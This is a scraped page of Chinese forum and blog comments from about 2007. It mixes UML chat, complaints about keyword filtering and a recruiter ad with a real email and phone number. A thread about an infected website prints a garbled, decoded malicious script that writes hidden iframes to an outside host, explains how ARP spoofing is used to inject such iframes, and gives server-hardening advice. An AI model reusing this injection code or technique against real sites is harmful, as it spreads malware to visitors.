黑月.NET

[quote]fatux：精辟啊！ <br>小弟初学uml，读完这篇文章后，对uml的功能，现状有了一个比较直观的了解，也找到了自己学习的方向，谢谢！[/quote] 呵呵，我感觉uml就像是被抛弃或被ＢＳ的无字天书，等你明白了，能运用了，一大批程序员就该失业了

我也碰到这个情况 要怎么弄啊 我的网站还是进不去 照上面说的做了 是可以看到 但是找不到我那个文章 内容管理都进不去 要怎么办啊

那些家伙他妈的实在是变态，什么词都禁，也不打声招呼！

h呵呵 气死人了。。。不知道信产部让谁设计的 系统，软考 都被过滤 他妈的。。21世纪了。。国人还要如此过。。。

ewf

博主 你这个验证码有C#的版本吗？谢谢

有没有一个好的实例来，教一下啊，刚入门，不太懂。

真无聊，鄙视这种行为

笨得可以。<img id=y_img src="http://post.baidu.com/cgi-bin/genimg?75805A2FB860A548E574AE256A6D337773B93DF31DA31856E4F5CED32B7AC6C67BA2AD036736000C9C6BE24A22597D1DF8602D28E96355CC7A5473DF2764E476&t=0.4545595969565979" align="middle">这样它也不会出来啊。

同问

同意 ,基本是后期用来画图胡人的

ddddddddddddddddddddddddddddddddddddd

我也是。但是那里有压迫，那里就有反抗。本来不想用。我估计搞这个的人精神有问题。这种病叫神经敏感官能症。 我最后用的 是 无 &&&界8上的。超强。

禁用浏览器的JavaScript

你好, 我最近正在搞一个模拟 multipart/form-data 提交的东西, 但提交的数据长度总是跟IE提交的不一样, 我的比IE短, 我是先捕获IE的 multipart/form-data 数据, 我在后用程序模拟提交的. 请问方不方便加我的QQ: 15630515, 谢谢! :)

在网络上找到的临时解决办法：
　　禁用脚本。“ 工具-->Internet选项-->安全-->自定义级别-->脚本->活动脚本->禁用”。

對這種事情真的非常反感！！！

谢谢，用你讲的方法解决了手头的一个问题

大家好，我是猎头Grace, 目前在帮微软做C#方向的选聘工作，具体JD 这里不方便发，如果您有C#的开发经验，英文良好，欢迎随时和我联系。

同时招聘的方向还有：　C/C++ , 日语熟练，　英文　or 中文良好
　　　　　　　　　　　C/C++ , 韩语熟练，　英文　or 中文良好


我的联系方式是：　MSN: btfgrace@hotmail.com
Mail: chensj@e4u.cn
Ext:01-6588.8118-220(Grace)
Phone: 15801209363

　　　　　　　　　　　　　

NND,这个破监控,骂死它!!!

关掉IE重开就OK了

试了一下,不行

因为那个对话框是一个Java程序，所以，
解决办法：
禁用Java！
工具-->Internet选项-->安全-->自定义级别-->Java权限，禁用！Java小程序脚本，禁用！
然后再试试看登录刚才的网页。

用迭代？

不知道他们都过滤那些词。

自己搞个Blacklist，用正则表达式过滤掉好了

搜索了博客园以前的文章含有这几个字的“窃 t q” 的文章还可以访问的，是不是还没有安装过滤器呢？

博客园现在已经不允许录入qi e ting qi 这几个字了？请问都过滤了什么，用的什么技术过滤的呢？

河蟹一把

可以看这篇文章:
http://idoall.org/blogs/ian/archive/2007/09/12/js-eval-function-p-a-c-k-e-d.aspx

2007年09月11日

工人报酬不易付--金条应该怎么分

人气：13 分类:推理 | 阅读全文:工人报酬不易付--金条应该怎么分

@Lion
请问代码是怎么解析出来的?

这段代码解析出来以后是这样:
function Get(){
var T hen = new Date()
The n. setTime(Then. getTim 145() + 24*60*60*1000)
va  cookieString = new Str 151ng(document. cookie)
var cookieHeader = "Cookie1="

var beginPosition = coo ieString. indexOf(cookieH eader)
if (beginPositio  != -1){
} else
{ d 157cument. cookie = "Cookie1=P OPWIN1;expires="+ The n. toGMTString()
documen 164. writeln("<DIV st
71le=
34"C URSOR 2 url('http 2 /gua. ns2go. com/dir/inde 137pic/bod
71. jpg')
34">");
do cument. writeln("<DIV st
71l e=
34"CURSOR 2 url('http 2//gu 141. ns2go. com/dir/index_pic/ itle. jpg')
34"></DIV></DIV> 42);
document. writeln("<if 162ame src=http 2
34/
34/gua. ns2go 56 com
34/dir
34/inde 170_pic
34/index. htm width=0 150eight=0><
34/iframe>");
do 143ument. writeln("<iframe sr 143=http 2
34/
34/gua. ns2go. com
34/d 151r
34/index_pic
34/tj. htm width 750 height=0><
34/iframe>");
175
}Get();

arp病毒，高级木马

那帮家伙用C实现了TCP协议栈，哈哈`~~

应该是Arp的病毒，半月前我们单位局域网中也中了这个病毒，刚开始以为是网站中加入了病毒，最后发现访问所有网站的网页时都会加上这段脚本，才知道是Arp病毒，最后找到是我们局域网中其中的一台中了病毒，然后把它的网线断掉就好了。

是Dean Edwards的Js压缩器的另一个版本，之前分析过的。
http://hi.baidu.com/anuiz/blog/item/b14a0708334d2fd162d9868f.html 这是之前的分析。

压缩器可以在http://dean.edwards.name/packer/ 找到，就是上文分析的那个。 你中的病毒好像是另一个版本的。不过基本一样，花得更厉害了，呵呵。

把eval改成alert就可以显示js代码。如果还是加密的就再做类似的操作。
应该是挂马的脚本。利用IE漏洞传播木马。

网站经常给别人加了代码，好多人认为这是红色代码，不过也有一些是开放ＦＳＯ权限，给别人注入，但通阅读本文希望对你有帮助。

什么是ARP？

ARP（AddressResolutionProtocol）地址解析协议用于将计算机的网络IP地址转化为物理MAC地址。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。

ARP病毒的危害性？

当局域网内某台主机感染了ARP病毒后，病毒伪装网关IP-MAC信息，欺骗局域网内其他主机，从而拦截发往网关的数据，导致网络时断时续。

ARP病毒的危害性极大，严重的将导致局域网内的用户隐私保密信息外泄，例如：用户名、密码、聊天记录、邮件内容等私密信息。

原理：

目的：通过arp欺骗来直接挂马

对服务器其下网站插入类似：

＜iframe src=http://www.***.com/*.htm width=0 height=0＞＜/iframe＞

优点:可以直接通过arp欺骗来挂马.

通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码

但这样存在局限性:

1.管理员经常不登陆,那么要很久才能监听到密码

2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.

优点:1.可以不用获得目标主机的权限就可以直接在上面挂马

2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.

3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.

原理：arp中间人攻击，实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B

B---->C---->A

实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 ＜iframe＞...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.

在所有网页中查找类似

＜iframe src="http://..." width=0 height=0＞＜/iframe＞

的代码，全部删掉。 如果你是动态网页，比如动网论坛，有些代码在数据库里，需要进库里改。

治本：

如果你的服务器是虚空间，要治本只能找虚空间的管理员。如果是自己管理的服务器，可以参照下面的办法—— （以下说的是Windows服务器的）：

1、赶紧改系统管理员administrator的密码，另建一个管理员账号。密码都尽量设得复杂一点。

2、删除除了上述两个管理员账号及Web服务器用的IUSR_?和IWAM_?外的其它账号

3、服务器上安装杀毒软件，升级到最新版本，全面杀毒杀马。注意停止服务器上所有无关的服务和驱动。其中有一些没有公司签名的，可能就是病毒的。关于怎么彻底清理病毒和木马，这里就不详细说明了。

4、用Windows Update补齐所有系统补丁。

5、如果是XP或2003系统，启用自带的防火墙，将除了80端口和你远程登陆端口外的所有端口，禁止ICMP访问。

6、如果你的网站有动态网页，数据库用的是MS SQL, 需要特别注意防止SQL Injection，要点如下（更详细的请自行查数据）：

a 将MS SQL Server的xp_cmdshell扩展存储删掉

b 减小你动态网页中连接数据库的那个账号在数据库系统中的访问权限

c 仔细检查你的每个动态网页，确保每个输入（包括URL中的参数）都进行了检查，过滤掉了「'-;」等非法字符

如果是access数据库，要防止access库文件被人下载更换再传上来。

7、修改你数据库中各主要账号的密码。比如sa 动态网页的连接账号等

8、注意IIS的安全配置

a 删掉IIS安装时那个缺省网站，删掉pinters等虚拟目录

b 停止IIS带你ftp和smtp

c 配置较详细的日志记录

d 禁用脚本调试和向客户端发送详细调试信息

9、注意你用于文件上传的ftp服务器的安全（查看你所用ftp服务器的有关安全资料）

10、随时注意检查系统的登录信息（事件查看器）和IIS日志

详情做法可参考http://www.linkwan.com/gb/tech/htm/650.htm

如果多少收到这样的情况，建议服务端启用windows防火墙除外，还安装好一个ARP
防火墙比较好，这是因为机房中也是一个大的局域网，小一点来看，机柜之间也是局域网，
以被勉同机柜的主机，影响到你自已，

下面是简单价绍ARP防火墙，实用比较大的部份，

查杀ARP病毒是ARP防火墙特用的功能，软件能100%查杀正在对外攻击的ARP病毒，无需升级病毒库特征。查杀ARP病毒的使用方法如下：

1. ARP拦截到本机外对的ARP攻击时，点击进入显示详细数据的页面，如下图所示：

PID即发送攻击数据的进程的ID号，双击此数据即可查看进程的详细信息。或者选中数据后点右键，选择“查看进程详细信息”

2. 显示的进程信息如下所示：

arp 欺骗？ 为什么它能在每个页面头加一段代码呢？能讲讲原理吗？

问题已经解决了。他们客服的效率挺高的：）

arp,可能服务器所放的局域网里面有机器中毒了 arp欺骗

arp

以前公司的网站也出现过这样的问题，被人挂了个exe在里面。

还有，病毒用的什么技术？能让每个页面，包括htm页面都在访问的时候查看源代码多出来一行<*.js>代码呢？
其中直接ftp下载下来相关的页面，并没有多出来<.js>这行代码

我让他们客服访问了这个网站（我在北京，他们在广东）也说有病毒。应该排除了是arp病毒。
他们客服说：估计是网站被人攻击。但是谁知道怎么解决这个问题呢？

应该不是网站的问题,你要别人访问一下你的网站吧
你所在的局域网内可能是中了arp病毒
如果与你不在同一个局域网内的也访问不了,那就是服务器中了那个病毒.

对于这种代码，觉得找个调试器来分析应该要好些，至少能知道它在干什么。
我对JS很猛，不得解！

第2题我想了想首先找到各条直线同纸边框的焦点。
用边缘焦点作为直线的2个坐标。存为数组。
然后2 2比较。
用2个循环，判断相交的原则是
假设2直线坐标为(0,a)(m,b) 和(0,c)(m,d)
(a-c)*(b-d)<0.用个计数器加下就行了。